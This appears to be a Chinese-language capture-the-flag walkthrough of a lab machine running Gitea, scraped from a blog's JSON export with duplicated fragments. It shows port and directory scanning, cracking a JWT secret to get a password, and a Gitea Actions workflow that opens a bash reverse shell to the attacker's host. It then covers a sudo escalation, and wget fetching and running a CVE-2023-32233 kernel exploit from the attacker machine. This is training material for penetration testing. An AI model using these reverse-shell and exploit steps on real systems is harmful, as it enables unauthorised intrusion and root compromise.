![\"image-20240324124245629\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403241541065.png\")
<\/div><\/p>\n\u554a\uff0ccrazy\uff0c\u662f\u8fd9\u4e2a\u5417\uff1f<\/p>\n
\u4fe1\u606f\u641c\u96c6<\/h2>\n\u7aef\u53e3\u626b\u63cf<\/h3>\nnmap -sCV -p- 10.0.2.10<\/code><\/pre>\nPORT STATE SERVICE VERSION\n3000\/tcp open ppp?\n| fingerprint-strings: \n| GenericLines, Help, RTSPRequest: \n| HTTP\/1.1 400 Bad Request\n| Content-Type: text\/plain; charset=utf-8\n| Connection: close\n| Request\n| GetRequest: \n| HTTP\/1.0 200 OK\n| Cache-Control: max-age=0, private, must-revalidate, no-transform\n| Content-Type: text\/html; charset=utf-8\n| Set-Cookie: i_like_gitea=e657b800ab664b37; Path=\/; HttpOnly; SameSite=Lax\n| Set-Cookie: _csrf=hdA99ulTmbdchrsbuBdsBWUT4qg6MTcxMTI1NTY1MzY2Njk4MjI5NQ; Path=\/; Max-Age=86400; HttpOnly; SameSite=Lax\n| X-Frame-Options: SAMEORIGIN\n| Date: Sun, 24 Mar 2024 04:47:33 GMT\n| <!DOCTYPE html>\n| <html lang="en-US" class="theme-auto">\n| <head>\n| <meta name="viewport" content="width=device-width, initial-scale=1">\n| <title>Gitea: Git with a cup of tea<\/title>\n| <link rel="manifest" href="data:application\/json;base64,eyJuYW1lIjoiR2l0ZWE6IEdpdCB3aXRoIGEgY3VwIG9mIHRlYSIsInNob3J0X25hbWUiOiJHaXRlYTogR2l0IHdpdGggYSBjdXAgb2YgdGVhIiwic3RhcnRfdXJsIjoiaHR0cDovLzE5Mi4xNjguMS45OjMwMDAvIiwiaWNvbnMiOlt7InNyYyI6Imh0dHA6Ly8xOTIuMTY4LjEuOTozMDAwL2Fzc2V0cy9pbWcvbG9nby5wbmciLCJ0eXBlIjoiaW1hZ2UvcG5nIiwic2l6ZXM\n| HTTPOptions: \n| HTTP\/1.0 405 Method Not Allowed\n| Allow: HEAD\n| Allow: HEAD\n| Allow: GET\n| Cache-Control: max-age=0, private, must-revalidate, no-transform\n| Set-Cookie: i_like_gitea=bbc8d31aced2309c; Path=\/; HttpOnly; SameSite=Lax\n| Set-Cookie: _csrf=07xHOkM3ddUge-6XE4DkGk67QW86MTcxMTI1NTY1ODY4Nzk5ODQzNw; Path=\/; Max-Age=86400; HttpOnly; SameSite=Lax\n| X-Frame-Options: SAMEORIGIN\n| Date: Sun, 24 Mar 2024 04:47:38 GMT\n|_ Content-Length: 0\n1 service unrecognized despite returning data. If you know the service\/version, please submit the following fingerprint at https:\/\/nmap.org\/cgi-bin\/submit.cgi?new-service :\nSF-Port3000-TCP:V=7.94SVN%I=7%D=3\/24%Time=65FFB063%P=x86_64-pc-linux-gnu%r\nSF:(GenericLines,67,"HTTP\/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Type:\\x\nSF:20text\/plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Ba\nSF:d\\x20Request")%r(GetRequest,1000,"HTTP\/1\\.0\\x20200\\x20OK\\r\\nCache-Contr\nSF:ol:\\x20max-age=0,\\x20private,\\x20must-revalidate,\\x20no-transform\\r\\nCo\nSF:ntent-Type:\\x20text\/html;\\x20charset=utf-8\\r\\nSet-Cookie:\\x20i_like_git\nSF:ea=e657b800ab664b37;\\x20Path=\/;\\x20HttpOnly;\\x20SameSite=Lax\\r\\nSet-Coo\nSF:kie:\\x20_csrf=hdA99ulTmbdchrsbuBdsBWUT4qg6MTcxMTI1NTY1MzY2Njk4MjI5NQ;\\x\nSF:20Path=\/;\\x20Max-Age=86400;\\x20HttpOnly;\\x20SameSite=Lax\\r\\nX-Frame-Opt\nSF:ions:\\x20SAMEORIGIN\\r\\nDate:\\x20Sun,\\x2024\\x20Mar\\x202024\\x2004:47:33\\x\nSF:20GMT\\r\\n\\r\\n<!DOCTYPE\\x20html>\\n<html\\x20lang=\\"en-US\\"\\x20class=\\"the\nSF:me-auto\\">\\n<head>\\n\\t<meta\\x20name=\\"viewport\\"\\x20content=\\"width=dev\nSF:ice-width,\\x20initial-scale=1\\">\\n\\t<title>Gitea:\\x20Git\\x20with\\x20a\\x\nSF:20cup\\x20of\\x20tea<\/title>\\n\\t<link\\x20rel=\\"manifest\\"\\x20href=\\"data:\nSF:application\/json;base64,eyJuYW1lIjoiR2l0ZWE6IEdpdCB3aXRoIGEgY3VwIG9mIHR\nSF:lYSIsInNob3J0X25hbWUiOiJHaXRlYTogR2l0IHdpdGggYSBjdXAgb2YgdGVhIiwic3Rhcn\nSF:RfdXJsIjoiaHR0cDovLzE5Mi4xNjguMS45OjMwMDAvIiwiaWNvbnMiOlt7InNyYyI6Imh0d\nSF:HA6Ly8xOTIuMTY4LjEuOTozMDAwL2Fzc2V0cy9pbWcvbG9nby5wbmciLCJ0eXBlIjoiaW1h\nSF:Z2UvcG5nIiwic2l6ZXM")%r(Help,67,"HTTP\/1\\.1\\x20400\\x20Bad\\x20Request\\r\\n\nSF:Content-Type:\\x20text\/plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\nSF:\\n\\r\\n400\\x20Bad\\x20Request")%r(HTTPOptions,1A4,"HTTP\/1\\.0\\x20405\\x20Me\nSF:thod\\x20Not\\x20Allowed\\r\\nAllow:\\x20HEAD\\r\\nAllow:\\x20HEAD\\r\\nAllow:\\x2\nSF:0GET\\r\\nCache-Control:\\x20max-age=0,\\x20private,\\x20must-revalidate,\\x2\nSF:0no-transform\\r\\nSet-Cookie:\\x20i_like_gitea=bbc8d31aced2309c;\\x20Path=\nSF:\/;\\x20HttpOnly;\\x20SameSite=Lax\\r\\nSet-Cookie:\\x20_csrf=07xHOkM3ddUge-6\nSF:XE4DkGk67QW86MTcxMTI1NTY1ODY4Nzk5ODQzNw;\\x20Path=\/;\\x20Max-Age=86400;\\x\nSF:20HttpOnly;\\x20SameSite=Lax\\r\\nX-Frame-Options:\\x20SAMEORIGIN\\r\\nDate:\\\nSF:x20Sun,\\x2024\\x20Mar\\x202024\\x2004:47:38\\x20GMT\\r\\nContent-Length:\\x200\nSF:\\r\\n\\r\\n")%r(RTSPRequest,67,"HTTP\/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nCont\nSF:ent-Type:\\x20text\/plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\nSF:\\n400\\x20Bad\\x20Request");<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\nsudo dirsearch -u http:\/\/10.0.2.10:3000 -e* -i 200,300,399 2>\/dev\/null<\/code><\/pre>\n[00:53:25] 200 - 1KB - \/.well-known\/openid-configuration\n[00:53:25] 200 - 206B - \/.well-known\/security.txt\n[00:53:34] 200 - 16KB - \/administrator\n[00:53:34] 200 - 16KB - \/administrator\/\n[00:53:36] 200 - 704B - \/api\/swagger\n[00:53:42] 200 - 18KB - \/dev\n[00:53:42] 200 - 18KB - \/dev\/\n[00:53:44] 200 - 15KB - \/explore\/repos\n[00:54:04] 200 - 283B - \/sitemap.xml\n[00:54:09] 200 - 10KB - \/user\/login\/<\/code><\/pre>\n\u6f0f\u6d1e\u6316\u6398<\/h2>\n\u8bbf\u95ee\u4e00\u4e0b\uff1a<\/h3>\n
![\"image-20240324125132363\"](\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\")
<\/div><\/p>\n\u8bbf\u95ee\u654f\u611f\u76ee\u5f55<\/h3>\nhttp:\/\/10.0.2.10:3000\/.well-known\/security.txt<\/code><\/pre>\n# This site is running a Gitea instance.\n# Gitea related security problems could be reported to Gitea community.\n# Site related security problems should be reported to this site's admin.\nContact: https:\/\/github.com\/go-gitea\/gitea\/blob\/main\/SECURITY.md\nPolicy: https:\/\/github.com\/go-gitea\/gitea\/blob\/main\/SECURITY.md\nPreferred-Languages: en<\/code><\/pre>\nhttp:\/\/10.0.2.10:3000\/.well-known\/openid-configuration<\/code><\/pre>\n{\n "issuer": "http:\/\/192.168.1.9:3000\/",\n "authorization_endpoint": "http:\/\/192.168.1.9:3000\/login\/oauth\/authorize",\n "token_endpoint": "http:\/\/192.168.1.9:3000\/login\/oauth\/access_token",\n "jwks_uri": "http:\/\/192.168.1.9:3000\/login\/oauth\/keys",\n "userinfo_endpoint": "http:\/\/192.168.1.9:3000\/login\/oauth\/userinfo",\n "introspection_endpoint": "http:\/\/192.168.1.9:3000\/login\/oauth\/introspect",\n "response_types_supported": [\n "code",\n "id_token"\n ],\n "id_token_signing_alg_values_supported": [\n "RS256"\n ],\n "subject_types_supported": [\n "public"\n ],\n "scopes_supported": [\n "openid",\n "profile",\n "email",\n "groups"\n ],\n "claims_supported": [\n "aud",\n "exp",\n "iat",\n "iss",\n "sub",\n "name",\n "preferred_username",\n "profile",\n "picture",\n "website",\n "locale",\n "updated_at",\n "email",\n "email_verified",\n "groups"\n ],\n "code_challenge_methods_supported": [\n "plain",\n "S256"\n ],\n "grant_types_supported": [\n "authorization_code",\n "refresh_token"\n ]\n}<\/code><\/pre>\n<\/div>
\n<\/div>
\n<\/div>
\n<\/div><\/p>\njwt\u7206\u7834<\/h3>\n
\u627e\u5230jwt_token<\/code>\uff0c\u89e3\u5bc6\u4e00\u4e0b\uff1a<\/p>\njwt_token = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTcwNzE0ODY1OCwianRpIjoiNjAwMWI5N2YtZjllOC00YTIxLThlYWMtYmE5NWEwY2Y4MDQ4IiwidHlwZSI6ImFjY2VzcyIsInN1YiI6ImRldiIsIm5iZiI6MTcwNzE0ODY1OCwiY3NyZiI6ImFkZjdmOTBiLWQ2NDctNDljZS1hNGRhLTQ3NDI1OWZkYzcyYyIsImV4cCI6MTcwNzE0OTI1OCwidXNlcm5hbWUiOiJkZXYifQ.tRZPFKRfJV7T-EHyQiBFqDEE1hl83MyCGtaBpSMwU_o"<\/code><\/pre>\n<\/div><\/p>\n\u53d1\u73b0\u4e86username<\/code>\uff0c\u5c1d\u8bd5\u4f7f\u7528john<\/code>\u7206\u7834\u4e00\u4e0b\uff1a<\/p>\npython jwt_tool.py eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTcwNzE0ODY1OCwianRpIjoiNjAwMWI5N2YtZjllOC00YTIxLThlYWMtYmE5NWEwY2Y4MDQ4IiwidHlwZSI6ImFjY2VzcyIsInN1YiI6ImRldiIsIm5iZiI6MTcwNzE0ODY1OCwiY3NyZiI6ImFkZjdmOTBiLWQ2NDctNDljZS1hNGRhLTQ3NDI1OWZkYzcyYyIsImV4cCI6MTcwNzE0OTI1OCwidXNlcm5hbWUiOiJkZXYifQ.tRZPFKRfJV7T-EHyQiBFqDEE1hl83MyCGtaBpSMwU_o -C -d \/usr\/share\/wordlists\/rockyou.txt<\/code><\/pre>\n<\/div><\/p>\ndev\ndeveloper88<\/code><\/pre>\n\u767b\u5f55\u5e76\u53cd\u5f39shell<\/h3>\n
\u6709\u4e86\u8d26\u53f7\u5bc6\u7801\uff0c\u5c1d\u8bd5\u767b\u5f55\uff1a<\/p>\n
<\/div>
\n<\/div><\/p>\ngit clone http:\/\/10.0.2.10:3000\/dev\/revershell.git\ncd revershell\nmkdir .gitea\ncd .gitea\nmkdir workflows\ncd workflows\nvim revershell.yaml<\/code><\/pre>\non: [push]\njobs:\n revershell:\n runs-on: run\n steps:\n - run: \/bin\/bash -i >& \/dev\/tcp\/10.0.2.4\/1234 0>&1<\/code><\/pre>\n<\/div><\/p>\n\u5c1d\u8bd5\u63d0\u4ea4\u66f4\u6539\uff1a<\/p>\n
git config user.email "dev@run.hmv"\ngit config user.name "dev"\ngit add .\ngit commit -m "revershell.yaml"\ngit push origin main<\/code><\/pre>\n<\/div><\/p>\n\u51c6\u5907\u53cd\u5f39\u7684\u65f6\u5019\u53d1\u73b0\u62a5\u9519\u4e86\uff1a<\/p>\n
Workflow config file is invalid. Please check your config file: yaml: line 3: found character that cannot start any token<\/code><\/pre>\n\u662f\u7f29\u8fdb\u6709\u95ee\u9898\uff0c\u6539\u4e86\u4e00\u4e0b\u5c31\u597d\u4e86\uff1a<\/p>\n
on: [push]\njobs:\n revershell:\n runs-on: run\n steps:\n - run: \/bin\/bash -i >& \/dev\/tcp\/10.0.2.4\/1234 0>&1<\/code><\/pre>\n<\/div>
\n<\/div><\/p>\n\u8981\u5148\u76d1\u542c\u518d\u542f\u52a8\u54e6\u3002<\/p>\n
\u63d0\u6743<\/h2>\n\u4fe1\u606f\u641c\u96c6<\/h3>\nact@db7db77ba113:~\/cache\/actions\/d05059a1ad22d066\/hostexecutor$ whoami\n# act\nact@db7db77ba113:~\/cache\/actions\/d05059a1ad22d066\/hostexecutor$ id\n# id\n# uid=1000(act) gid=1000(act) groups=1000(act),27(sudo),100(users),115(docker115)\nact@db7db77ba113:~\/cache\/actions\/d05059a1ad22d066\/hostexecutor$ find \/ -perm -u=s -type f 2>\/dev\/null\n# <hostexecutor$ find \/ -perm -u=s -type f 2>\/dev\/null \n# \/usr\/bin\/su\n# \/usr\/bin\/chfn\n# \/usr\/bin\/mount\n# \/usr\/bin\/gpasswd\n# \/usr\/bin\/newgrp\n# \/usr\/bin\/chsh\n# \/usr\/bin\/passwd\n# \/usr\/bin\/umount\n# \/usr\/bin\/sudo\n# \/usr\/lib\/openssh\/ssh-keysign\nact@db7db77ba113:~\/cache\/actions\/d05059a1ad22d066\/hostexecutor$ sudo -l\n# sudo -l\n# Matching Defaults entries for act on db7db77ba113:\n# env_reset, mail_badpass,\n# secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin,\n# use_pty\n\n# User act may run the following commands on db7db77ba113:\n# (ALL : ALL) ALL\n# (ALL) NOPASSWD: ALL<\/code><\/pre>\n\u63d0\u6743\u81f3docker root<\/h3>\nact@db7db77ba113:~\/cache\/actions\/d05059a1ad22d066\/hostexecutor$ sudo su\n# sudo su\nwhoami\n# root\nid\n# uid=0(root) gid=0(root) groups=0(root)\ncd \/root\nls -la\n# total 20\n# drwx------ 1 root root 4096 Mar 24 04:41 .\n# drwxr-xr-x 1 root root 4096 Mar 24 04:41 ..\n# -rw-r--r-- 1 root root 571 Apr 10 2021 .bashrc\n# -rw-r--r-- 1 root root 161 Jul 9 2019 .profile\n# drwx------ 2 root root 4096 Feb 6 08:11 .ssh\n# -rw-r--r-- 1 root root 0 Mar 24 04:41 .sudo_as_admin_successful<\/code><\/pre>\n\u6269\u5c55shell<\/h4>\nscript \/dev\/null -c bash\n# Script started, output log file is '\/dev\/null'.<\/code><\/pre>\n\u5207\u6362\u81f3dev\u7528\u6237<\/h3>\nroot@db7db77ba113:~# ip a\nip a\n1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000\n link\/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00\n inet 127.0.0.1\/8 scope host lo\n valid_lft forever preferred_lft forever\n12: eth0@if13: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default \n link\/ether 02:42:ac:12:00:04 brd ff:ff:ff:ff:ff:ff link-netnsid 0\n inet 172.18.0.4\/16 brd 172.18.255.255 scope global eth0\n valid_lft forever preferred_lft forever<\/code><\/pre>\n\u5c1d\u8bd5 ssh \u8fde\u63a5\u4e00\u4e0b\uff1a<\/p>\n
su dev\n# su: user dev does not exist or the user entry does not contain all the required fields\nssh dev@172.18.0.4\n# ssh: connect to host 172.18.0.4 port 22: Connection refused<\/code><\/pre>\n\u770b\u6765\u4e0d\u80fd\u778e\u641e\uff0c\u4f20\u4e00\u4e2afscan<\/code>\u626b\u63cf\u4e00\u4e0b\uff1a<\/p>\nfscan\u626b\u63cf<\/h4>\n
<\/div><\/p>\n\u53d1\u73b0\u4e24\u4e2a\u5f00\u542f\u4e8622\u7aef\u53e3\uff0c\u5c1d\u8bd5\u8fdb\u884c\u8fde\u63a5\uff1a<\/p>\n
<\/div><\/p>\n\u63d0\u6743\u81f3root<\/h3>\n\u4fe1\u606f\u641c\u96c6<\/h4>\ndev@run:~$ sudo -l\nsudo -l\n# [sudo] password for dev: developer88\n\n# Sorry, user dev may not run sudo on run.\ndev@run:~$ whoami;id\nwhoami;id\n# dev\n# uid=1000(dev) gid=1000(dev) groups=1000(dev)\ndev@run:~$ find \/ -perm -u=s -type f 2>\/dev\/null\nfind \/ -perm -u=s -type f 2>\/dev\/null\n# \/usr\/bin\/fusermount3\n# \/usr\/bin\/su\n# \/usr\/bin\/chfn\n# \/usr\/bin\/mount\n# \/usr\/bin\/sudo\n# \/usr\/bin\/gpasswd\n# \/usr\/bin\/newgrp\n# \/usr\/bin\/chsh\n# \/usr\/bin\/passwd\n# \/usr\/bin\/umount\n# \/usr\/libexec\/polkit-agent-helper-1\n# \/usr\/lib\/openssh\/ssh-keysign\n# \/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\ndev@run:~$ ls -la\nls -la\n# total 32\n# drwxr-x--- 4 dev dev 4096 Mar 24 06:49 .\n# drwxr-xr-x 3 root root 4096 Feb 5 13:10 ..\n# lrwxrwxrwx 1 root root 9 Feb 5 13:40 .bash_history -> \/dev\/null\n# -rw-r--r-- 1 dev dev 220 Jan 7 2023 .bash_logout\n# -rw-r--r-- 1 dev dev 3771 Jan 7 2023 .bashrc\n# drwx------ 2 dev dev 4096 Mar 24 06:49 .cache\n# -rw-r--r-- 1 dev dev 807 Jan 7 2023 .profile\n# drwx------ 2 dev dev 4096 Feb 5 13:10 .ssh\n# -rw------- 1 dev dev 33 Feb 6 16:01 user.txt\ndev@run:~$ cat user.txt\ncat user.txt\n# 56f98bdfaf5186243bc4cb99f0674f58\ndev@run:~$ cat \/etc\/cron*\ncat \/etc\/cron*\n# cat: \/etc\/cron.d: Is a directory\n# cat: \/etc\/cron.daily: Is a directory\n# cat: \/etc\/cron.hourly: Is a directory\n# cat: \/etc\/cron.monthly: Is a directory\n# # \/etc\/crontab: system-wide crontab\n# # Unlike any other crontab you don't have to run the `crontab'\n# # command to install the new version when you edit this file\n# # and files in \/etc\/cron.d. These files also have username fields,\n# # that none of the other crontabs do.\n\n# SHELL=\/bin\/sh\n# # You can also override PATH, but by default, newer versions inherit it from the environment\n# #PATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/sbin:\/bin:\/usr\/sbin:\/usr\/bin\n\n# # Example of job definition:\n# # .---------------- minute (0 - 59)\n# # | .------------- hour (0 - 23)\n# # | | .---------- day of month (1 - 31)\n# # | | | .------- month (1 - 12) OR jan,feb,mar,apr ...\n# # | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat\n# # | | | | |\n# # * * * * * user-name command to be executed\n# 17 * * * * root cd \/ && run-parts --report \/etc\/cron.hourly\n# 25 6 * * * root test -x \/usr\/sbin\/anacron || { cd \/ && run-parts --report \/etc\/cron.daily; }\n# 47 6 * * 7 root test -x \/usr\/sbin\/anacron || { cd \/ && run-parts --report \/etc\/cron.weekly; }\n# 52 6 1 * * root test -x \/usr\/sbin\/anacron || { cd \/ && run-parts --report \/etc\/cron.monthly; }\n# cat: \/etc\/cron.weekly: Is a directory\ndev@run:~$ cat \/etc\/passwd\ncat \/etc\/passwd\n# root:x:0:0:root:\/root:\/bin\/bash\n# daemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\n# bin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\n# sys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\n# sync:x:4:65534:sync:\/bin:\/bin\/sync\n# games:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\n# man:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\n# lp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\n# mail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\n# news:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\n# uucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\n# proxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\n# www-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\n# backup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\n# list:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\n# irc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\n# _apt:x:42:65534::\/nonexistent:\/usr\/sbin\/nologin\n# nobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\n# systemd-network:x:998:998:systemd Network Management:\/:\/usr\/sbin\/nologin\n# systemd-timesync:x:997:997:systemd Time Synchronization:\/:\/usr\/sbin\/nologin\n# messagebus:x:100:106::\/nonexistent:\/usr\/sbin\/nologin\n# systemd-resolve:x:996:996:systemd Resolver:\/:\/usr\/sbin\/nologin\n# pollinate:x:101:1::\/var\/cache\/pollinate:\/bin\/false\n# syslog:x:103:109::\/nonexistent:\/usr\/sbin\/nologin\n# uuidd:x:104:110::\/run\/uuidd:\/usr\/sbin\/nologin\n# tcpdump:x:105:111::\/nonexistent:\/usr\/sbin\/nologin\n# tss:x:106:112:TPM software stack,,,:\/var\/lib\/tpm:\/bin\/false\n# landscape:x:107:113::\/var\/lib\/landscape:\/usr\/sbin\/nologin\n# fwupd-refresh:x:108:114:fwupd-refresh user,,,:\/run\/systemd:\/usr\/sbin\/nologin\n# dev:x:1000:1000:dev:\/home\/dev:\/bin\/bash\n# lxd:x:999:100::\/var\/snap\/lxd\/common\/lxd:\/bin\/false\n# dnsmasq:x:109:65534:dnsmasq,,,:\/var\/lib\/misc:\/usr\/sbin\/nologin\n# sshd:x:102:65534::\/run\/sshd:\/usr\/sbin\/nologin\ndev@run:~$ uname -a\nuname -a\n# Linux run 6.2.0-20-generic #20-Ubuntu SMP PREEMPT_DYNAMIC Thu Apr 6 07:48:48 UTC 2023 x86_64 x86_64 x86_64 GNU\/Linux\ndev@run:~$ lsb_release -a\nlsb_release -a\n# No LSB modules are available.\n# Distributor ID: Ubuntu\n# Description: Ubuntu 23.04\n# Release: 23.04\n# Codename: lunar<\/code><\/pre>\n\u6b64\u5916\u8fd8\u8fdb\u884c\u4e86\u4ee5\u4e0b\u63a2\u7d22\uff0c\u5c31\u4e0d\u7c98\u8d34\u4e0a\u53bb\u4e86\uff1a<\/p>\n
cat \/etc\/profile\nps aux \nps aux | grep root\nls -alh \/usr\/bin\/ \ncat \/etc\/resolv.conf <\/code><\/pre>\n\u4f46\u662f\u5747\u65e0\u679c\uff0c\u770b\u4e86\u88ab\u4eba\u601d\u8def\u53d1\u73b0\u662f\u4e2a\u5185\u6838\u63d0\u6743\u3002\u3002\u3002\u3002\u3002\u3002<\/p>\n
\u5185\u6838\u63d0\u6743<\/h3>\n
<\/div><\/p>\n# kali\ngit clone https:\/\/github.com\/Liuk3r\/CVE-2023-32233.git\ncd CVE-2023-32233\nsudo apt install gcc libmnl-dev libnftnl-dev\ngcc -Wall -o exploit exploit.c -lmnl -lnftnl\npython3 -m http.server 8888<\/code><\/pre>\n# dev\ncd \/tmp\nwget http:\/\/10.0.2.4:8888\/exploit\nchmod +x exploit\n.\/exploit<\/code><\/pre>\n\u6211\u8fd9\u8fb9\u91cd\u542f\u4e86\u4e00\u4e0b\u9776\u673a\uff0c\u91cd\u65b0\u6765\u4e86\u4e00\u6b21\uff1a<\/p>\n
<\/div><\/p>\n\u83b7\u5f97\u4e86rootshell\uff01\uff01\uff01<\/p>\n
\u5bfb\u627eflag<\/h3>\n# whoami;id\nwhoami;id\n# root\n# uid=0(root) gid=0(root) groups=0(root),1000(dev)\ncd \/root\ncd \/root\nls\n# ls\n# 1 root.txt script.sh\ncat script.sh\n# cat script.sh\n# cd \/opt\/gitea && docker-compose down\n# cd \/opt\/gitea && docker-compose up -d\n# systemctl enable --now ssh.service\ncat root.txt\n# cat root.txt\n# 008b138f906537f51a5a5c2c69c4b8a2<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"run \u554a\uff0ccrazy\uff0c\u662f\u8fd9\u4e2a\u5417\uff1f \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf nmap -sCV -p- 10.0.2.10 POR […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-454","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/454","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=454"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/454\/revisions"}],"predecessor-version":[{"id":455,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/454\/revisions\/455"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=454"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=454"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=454"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
nmap -sCV -p- 10.0.2.10<\/code><\/pre>\nPORT STATE SERVICE VERSION\n3000\/tcp open ppp?\n| fingerprint-strings: \n| GenericLines, Help, RTSPRequest: \n| HTTP\/1.1 400 Bad Request\n| Content-Type: text\/plain; charset=utf-8\n| Connection: close\n| Request\n| GetRequest: \n| HTTP\/1.0 200 OK\n| Cache-Control: max-age=0, private, must-revalidate, no-transform\n| Content-Type: text\/html; charset=utf-8\n| Set-Cookie: i_like_gitea=e657b800ab664b37; Path=\/; HttpOnly; SameSite=Lax\n| Set-Cookie: _csrf=hdA99ulTmbdchrsbuBdsBWUT4qg6MTcxMTI1NTY1MzY2Njk4MjI5NQ; Path=\/; Max-Age=86400; HttpOnly; SameSite=Lax\n| X-Frame-Options: SAMEORIGIN\n| Date: Sun, 24 Mar 2024 04:47:33 GMT\n| <!DOCTYPE html>\n| <html lang="en-US" class="theme-auto">\n| <head>\n| <meta name="viewport" content="width=device-width, initial-scale=1">\n| <title>Gitea: Git with a cup of tea<\/title>\n| <link rel="manifest" href="data:application\/json;base64,eyJuYW1lIjoiR2l0ZWE6IEdpdCB3aXRoIGEgY3VwIG9mIHRlYSIsInNob3J0X25hbWUiOiJHaXRlYTogR2l0IHdpdGggYSBjdXAgb2YgdGVhIiwic3RhcnRfdXJsIjoiaHR0cDovLzE5Mi4xNjguMS45OjMwMDAvIiwiaWNvbnMiOlt7InNyYyI6Imh0dHA6Ly8xOTIuMTY4LjEuOTozMDAwL2Fzc2V0cy9pbWcvbG9nby5wbmciLCJ0eXBlIjoiaW1hZ2UvcG5nIiwic2l6ZXM\n| HTTPOptions: \n| HTTP\/1.0 405 Method Not Allowed\n| Allow: HEAD\n| Allow: HEAD\n| Allow: GET\n| Cache-Control: max-age=0, private, must-revalidate, no-transform\n| Set-Cookie: i_like_gitea=bbc8d31aced2309c; Path=\/; HttpOnly; SameSite=Lax\n| Set-Cookie: _csrf=07xHOkM3ddUge-6XE4DkGk67QW86MTcxMTI1NTY1ODY4Nzk5ODQzNw; Path=\/; Max-Age=86400; HttpOnly; SameSite=Lax\n| X-Frame-Options: SAMEORIGIN\n| Date: Sun, 24 Mar 2024 04:47:38 GMT\n|_ Content-Length: 0\n1 service unrecognized despite returning data. If you know the service\/version, please submit the following fingerprint at https:\/\/nmap.org\/cgi-bin\/submit.cgi?new-service 